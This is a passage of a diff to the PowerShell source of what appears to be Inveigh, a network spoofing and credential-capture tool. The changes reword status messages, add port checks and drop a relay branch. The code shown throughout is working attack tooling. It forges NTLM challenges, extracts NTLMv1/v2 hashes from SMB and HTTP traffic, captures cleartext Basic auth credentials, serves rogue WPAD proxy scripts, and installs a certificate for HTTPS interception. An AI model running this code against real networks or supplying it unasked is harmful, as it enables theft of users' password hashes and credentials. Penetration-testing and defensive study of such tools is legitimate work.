($SpooferIPsReply -join ",")) > $null } if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) { - $inveigh.status_queue.Add("Ignoring requests from " + $SpooferIPsIgnore -join ",") > $null + $inveigh.status_queue.Add("Spoofer IPs Ignore = " + ($SpooferIPsIgnore -join ",")) > $null } if($SpooferRepeat -eq 'N') { $inveigh.spoofer_repeat = $false - $inveigh.status_queue.Add("Spoofer Repeating Disabled") > $null + $inveigh.status_queue.Add("Spoofer Repeating = Disabled") > $null } else { @@ -555,54 +542,78 @@ else if($SMB -eq 'Y') { - $inveigh.status_queue.Add("SMB Capture Enabled") > $null + $inveigh.status_queue.Add("SMB Capture = Enabled") > $null } else { - $inveigh.status_queue.Add("SMB Capture Disabled") > $null + $inveigh.status_queue.Add("SMB Capture = Disabled") > $null } if($HTTP -eq 'Y') { - $inveigh.HTTP = $true - $inveigh.status_queue.Add("HTTP Capture Enabled") > $null + + $HTTP_port_check = netstat -anp TCP | findstr 0.0.0.0:80 + + if($HTTP_port_check) + { + $inveigh.HTTP = $false + $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port 80") > $null + } + else + { + $inveigh.HTTP = $true + $inveigh.status_queue.Add("HTTP Capture = Enabled") > $null + } + } else { $inveigh.HTTP = $false - $inveigh.status_queue.Add("HTTP Capture Disabled") > $null + $inveigh.status_queue.Add("HTTP Capture = Disabled") > $null } if($HTTPS -eq 'Y') { - try + $HTTPS_port_check = netstat -anp TCP | findstr 0.0.0.0:443 + + if($HTTPS_port_check) { - $inveigh.HTTPS = $true - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 - $certificate.Import($PWD.Path + "\Inveigh.pfx") - $certificate_store.Add($certificate) - $certificate_store.Close() - $netsh_certhash = "certhash=" + $inveigh.certificate_thumbprint - $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}" - $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID) - & "netsh" $netsh_arguments > $null - $inveigh.status_queue.Add("HTTPS Capture Enabled") > $null + $inveigh.HTTP = $true + $inveigh.status_queue.Add("HTTPS Capture Disabled Due To In Use Port 443") > $null } - catch + else { - $certificate_store.Close() - $HTTPS="N" - $inveigh.HTTPS = $false - $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error") > $null + + try + { + $inveigh.HTTPS = $true + $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") + $certificate_store.Open('ReadWrite') + $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 + $certificate.Import($PWD.Path + "\Inveigh.pfx") + $certificate_store.Add($certificate) + $certificate_store.Close() + $netsh_certhash = "certhash=" + $inveigh.certificate_thumbprint + $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}" + $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID) + & "netsh" $netsh_arguments > $null + $inveigh.status_queue.Add("HTTPS Capture = Enabled") > $null + } + catch + { + $certificate_store.Close() + $HTTPS="N" + $inveigh.HTTPS = $false + $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error") > $null + } + } } else { - $inveigh.status_queue.Add("HTTPS Capture Disabled") > $null + $inveigh.status_queue.Add("HTTPS Capture = Disabled") > $null } if($inveigh.HTTP -or $inveigh.HTTPS) @@ -628,7 +639,7 @@ if($inveigh.HTTP -or $inveigh.HTTPS) if($HTTPResponse) { - $inveigh.status_queue.Add("HTTP/HTTPS Custom Response Enabled") > $null + $inveigh.status_queue.Add("HTTP/HTTPS Custom Response = Enabled") > $null } if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic') @@ -638,7 +649,7 @@ if($inveigh.HTTP -or $inveigh.HTTPS) if($WPADIP -and $WPADPort) { - $inveigh.status_queue.Add("WPAD Response Enabled") > $null + $inveigh.status_queue.Add("WPAD Response = Enabled") > $null $inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort") > $null if($WPADDirectHosts) @@ -648,27 +659,24 @@ if($inveigh.HTTP -or $inveigh.HTTPS) $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";' } - $inveigh.WPAD_response = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" - $inveigh.status_queue.Add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",") > $null + $WPADResponse = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" + $inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null } else { - $inveigh.WPAD_response = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" + $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" } } elseif($WPADResponse -and !$WPADIP -and !$WPADPort) { - $inveigh.status_queue.Add("WPAD Custom Response Enabled") > $null - $inveigh.WPAD_response = $WPADResponse + $inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null + $WPADResponse = $WPADResponse } - else + elseif($WPADEmptyFile -eq 'Y') { - if($WPADEmptyFile -eq 'Y') - { - $inveigh.status_queue.Add("WPAD Default Response Enabled") > $null - $inveigh.WPAD_response = "function FindProxyForURL(url,host){return `"DIRECT`";}" - } + $inveigh.status_queue.Add("WPAD Default Response = Enabled") > $null + $WPADResponse = "function FindProxyForURL(url,host){return `"DIRECT`";}" } if($Challenge) @@ -680,7 +688,7 @@ if($inveigh.HTTP -or $inveigh.HTTPS) if($MachineAccounts -eq 'N') { - $inveigh.status_queue.Add("Ignoring Machine Accounts") > $null + $inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null $inveigh.machine_accounts = $false } else @@ -690,7 +698,7 @@ else if($ConsoleOutput -eq 'Y') { - $inveigh.status_queue.Add("Real Time Console Output Enabled") > $null + $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null $inveigh.console_output = $true if($ConsoleStatus -eq 1) @@ -712,7 +720,7 @@ else } else { - $inveigh.status_queue.Add("Real Time Console Output Disabled") > $null + $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null } } @@ -728,13 +736,13 @@ else if($FileOutput -eq 'Y') { - $inveigh.status_queue.Add("Real Time File Output Enabled") > $null + $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null $inveigh.status_queue.Add("Output Directory = $output_directory") > $null $inveigh.file_output = $true } else { - $inveigh.status_queue.Add("Real Time File Output Disabled") > $null + $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null } if($FileUnique -eq 'Y') @@ -755,56 +763,56 @@ elseif($RunTime -gt 1) $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null } -if($SMBRelay -eq 'N') +if($ShowHelp -eq 'Y') { - - if($ShowHelp -eq 'Y') - { - $inveigh.status_queue.Add("Use Get-Command -Noun Inveigh* to show available functions") > $null - $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh") > $null + $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh") > $null - if($inveigh.console_output) - { - $inveigh.status_queue.Add("Press any key to stop real time console output") > $null - } - + if($inveigh.console_output) + { + $inveigh.status_queue.Add("Press any key to stop real time console output") > $null } - if($inveigh.status_output) +} + +if($inveigh.status_output) +{ + + while($inveigh.status_queue.Count -gt 0) { - while($inveigh.status_queue.Count -gt 0) + if($inveigh.output_stream_only) + { + Write-Output($inveigh.status_queue[0] + $inveigh.newline) + $inveigh.status_queue.RemoveAt(0) + } + else { - if($inveigh.output_stream_only) - { - Write-Output($inveigh.status_queue[0] + $inveigh.newline) - $inveigh.status_queue.RemoveRange(0,1) - } - else + switch -Wildcard ($inveigh.status_queue[0]) { - switch ($inveigh.status_queue[0]) + "* Disabled Due To *" { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } - "Run Stop-Inveigh to stop Inveigh" - { - Write-Warning($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) - } - - "Windows Firewall = Enabled" - { - Write-Warning($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) - } + "Run Stop-Inveigh to stop Inveigh" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } - default - { - Write-Output($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) - } + "Windows Firewall = Enabled" + { + Write-Warning($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) + } + default + { + Write-Output($inveigh.status_queue[0]) + $inveigh.status_queue.RemoveAt(0) } } @@ -812,18 +820,7 @@ if($SMBRelay -eq 'N') } } -} -else -{ - try - { - Invoke-InveighRelay -HTTP $HTTP -HTTPS $HTTPS -HTTPSCertAppID $HTTPSCertAppID -HTTPSCertThumbprint $HTTPSCertThumbprint -WPADAuth $WPADAuth -SMBRelayTarget $SMBRelayTarget -SMBRelayUsernames $SMBRelayUsernames -SMBRelayAutoDisable $SMBRelayAutoDisable -SMBRelayNetworkTimeout $SMBRelayNetworkTimeout -SMBRelayCommand $SMBRelayCommand -Tool $Tool -ShowHelp $ShowHelp - } - catch - { - $inveigh.running = $false - throw "Invoke-InveighRelay is not loaded" - } + } # Begin ScriptBlocks @@ -831,6 +828,7 @@ else # Shared Basic Functions ScriptBlock $shared_basic_functions_scriptblock = { + function DataToUInt16($field) { [Array]::Reverse($field) @@ -869,6 +867,7 @@ $shared_basic_functions_scriptblock = $string_extract = New-Object System.String ($string_data,0,$string_data.Length) return $string_extract } + } # SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response @@ -883,7 +882,7 @@ $SMB_NTLM_functions_scriptblock = $payload = $payload -replace "-","" $NTLM_index = $payload.IndexOf("4E544C4D53535000") - if($payload.SubString(($NTLM_index + 16),8) -eq "02000000") + if($NTLM_index -gt 0 -and $payload.SubString(($NTLM_index + 16),8) -eq "02000000") { $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16) } @@ -899,7 +898,7 @@ $SMB_NTLM_functions_scriptblock = $payload = $payload -replace "-","" $NTLMSSP_hex_offset = $payload.IndexOf("4E544C4D53535000") - if($payload.SubString(($NTLMSSP_hex_offset + 16),8) -eq "03000000") + if($NTLMSSP_hex_offset -gt 0 -and $payload.SubString(($NTLMSSP_hex_offset + 16),8) -eq "03000000") { $NTLMSSP_offset = $NTLMSSP_hex_offset / 2 @@ -923,7 +922,7 @@ $SMB_NTLM_functions_scriptblock = $host_offset = DataLength4 ($NTLMSSP_offset + 48) $payload_bytes $NTLM_host_string = DataToString ($NTLMSSP_offset + $host_offset) $host_length $payload_bytes - if ($NTLM_length -gt 24) + if($NTLM_length -gt 24) { $NTLMv2_response = $NTLM_response.Insert(32,':') $NTLMv2_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLMv2_response @@ -952,9 +951,16 @@ $SMB_NTLM_functions_scriptblock = { $inveigh.NTLMv2_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string") } + + if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP) + { + $inveigh.IP_capture_list.Add($source_IP.IPAddressToString) + } + } + } - else + elseif($NTLM_length -eq 24) { $NTLMv1_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $LM_response + ":" + $NTLM_response + ":" + $NTLM_challenge @@ -982,13 +988,16 @@ $SMB_NTLM_functions_scriptblock = { $inveigh.NTLMv1_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string") } + + if($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP) + { + $inveigh.IP_capture_list.Add($source_IP.IPAddressToString) + } + } - } - if ($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP) - { - $inveigh.IP_capture_list.Add($source_IP.IPAddressToString) } + } } @@ -998,20 +1007,21 @@ $SMB_NTLM_functions_scriptblock = # HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener $HTTP_scriptblock = { - param ($HTTPAuth,$HTTPBasicRealm,$WPADAuth) + param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$WPADAuth,$WPADResponse) function NTLMChallengeBase64 { + param ([String]$Challenge) $HTTP_timestamp = Get-Date $HTTP_timestamp = $HTTP_timestamp.ToFileTime() $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp)) $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - if($inveigh.challenge) + if($Challenge) { - $HTTP_challenge = $inveigh.challenge - $HTTP_challenge_bytes = $inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') + $HTTP_challenge = $Challenge + $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} } else @@ -1024,19 +1034,19 @@ $HTTP_scriptblock = $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38, - 0x00,0x00,0x00,0x05,0x82,0x89,0xa + - $HTTP_challenge_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, - 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, - 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, - 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, - 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, - 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, - 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, - 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, - 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + - $HTTP_timestamp + - 0x00,0x00,0x00,0x00,0x0a,0x0a + 0x00,0x00,0x00,0x05,0x82,0x89,0xa + + $HTTP_challenge_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, + 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, + 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, + 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, + 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, + 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, + 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, + 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, + 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + + $HTTP_timestamp + + 0x00,0x00,0x00,0x00,0x0a,0x0a $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) $NTLM = 'NTLM ' + $NTLM_challenge_base64 @@ -1054,7 +1064,7 @@ $HTTP_scriptblock = $inveigh.response = $inveigh.context.Response $NTLM = 'NTLM' $NTLM_auth = $false - $Basic_auth = $false + $basic_auth = $false if($inveigh.request.IsSecureConnection) { @@ -1075,8 +1085,9 @@ $HTTP_scriptblock = } $HTTP_request_time = Get-Date -format 's' + $HTTP_source_IP = $inveigh.request.RemoteEndpoint.Address.IPAddressToString - if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $inveigh.request.RemoteEndpoint.Address -eq $HTTP_request_remote_endpoint_old) + if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $HTTP_source_IP -eq $HTTP_request_remote_endpoint_old) { $HTTP_raw_url_output = $false } @@ -1087,35 +1098,35 @@ $HTTP_scriptblock = if(!$inveigh.request.headers["Authorization"] -and $inveigh.HTTP_listener.IsListening -and $HTTP_raw_url_output) { - $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address) - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)]) + $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from $HTTP_source_IP") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from $HTTP_source_IP")]) } $HTTP_request_raw_url_old = $inveigh.request.RawUrl - $HTTP_request_remote_endpoint_old = $inveigh.request.RemoteEndpoint.Address + $HTTP_request_remote_endpoint_old = $HTTP_source_IP $HTTP_request_time_old = $HTTP_request_time - [String] $authentication_header = $inveigh.request.headers.GetValues('Authorization') + [String]$authentication_header = $inveigh.request.headers.GetValues('Authorization') if($authentication_header.StartsWith('NTLM ')) { $authentication_header = $authentication_header -replace 'NTLM ','' - [Byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header) + [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header) $inveigh.response.StatusCode = 401 - if($HTTP_request_bytes[8] -eq 1) + if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00') { $inveigh.response.StatusCode = 401 - $NTLM = NTLMChallengeBase64 + $NTLM = NTLMChallengeBase64 $Challenge } - elseif($HTTP_request_bytes[8] -eq 3) + elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00') { $NTLM = 'NTLM' $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes - [String] $NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*' + [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $inveigh.request.RemoteEndpoint.Port + '*' $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge) $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1) @@ -1144,27 +1155,27 @@ $HTTP_scriptblock = if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")]) + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")]) $inveigh.NTLMv1_list.Add($inveigh.HTTP_NTLM_hash) - if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains $inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) { - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash) + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $inveigh.HTTP_NTLM_hash) } else { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ") for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") } - if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))) + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) { $inveigh.NTLMv1_file_queue.Add($inveigh.HTTP_NTLM_hash) $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) } - if($inveigh.NTLMv1_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + if($inveigh.NTLMv1_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) { - $inveigh.NTLMv1_username_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") } } @@ -1182,38 +1193,38 @@ $HTTP_scriptblock = $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")]) $inveigh.NTLMv2_list.Add($inveigh.HTTP_NTLM_hash) - if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash) + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $inveigh.HTTP_NTLM_hash) } else { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ") for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") + $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") } - if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))) + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))) { $inveigh.NTLMv2_file_queue.Add($inveigh.HTTP_NTLM_hash) $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) } - if($inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + if($inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) { - $inveigh.NTLMv2_username_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") } } } - if($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address.IPAddressToString -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat) + if($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat) { - $inveigh.IP_capture_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString) + $inveigh.IP_capture_list.Add($HTTP_source_IP) } $inveigh.response.StatusCode = 200 $NTLM_auth = $true - $NTLM_challenge = '' + $NTLM_challenge = "" $HTTP_raw_url_output = $true } @@ -1226,13 +1237,13 @@ $HTTP_scriptblock = elseif($authentication_header.StartsWith('Basic ')) # Thanks to @xorrior for the initial basic auth code { $inveigh.response.StatusCode = 200 - $Basic_auth = $true + $basic_auth = $true $authentication_header = $authentication_header -replace 'Basic ','' $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header)) - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from " + $inveigh.request.RemoteEndpoint.Address)]) + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")]) $inveigh.cleartext_file_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + ",$HTTP_type,$cleartext_credentials") $inveigh.cleartext_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + ",$HTTP_type,$cleartext_credentials") - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from " + $inveigh.request.RemoteEndpoint.Address) + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP") if($inveigh.file_output) { @@ -1241,38 +1252,38 @@ $HTTP_scriptblock = } - if(($HTTPAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -match '/wpad.dat') -or $NTLM_Auth -or $Basic_auth) + if(($HTTPAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -match '/wpad.dat') -or $NTLM_Auth -or $basic_auth) { - if($inveigh.HTTP_directory -and $inveigh.HTTP_default_EXE -and $inveigh.request.RawUrl -like '*.exe' -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE)) -and !(Test-Path (Join-Path 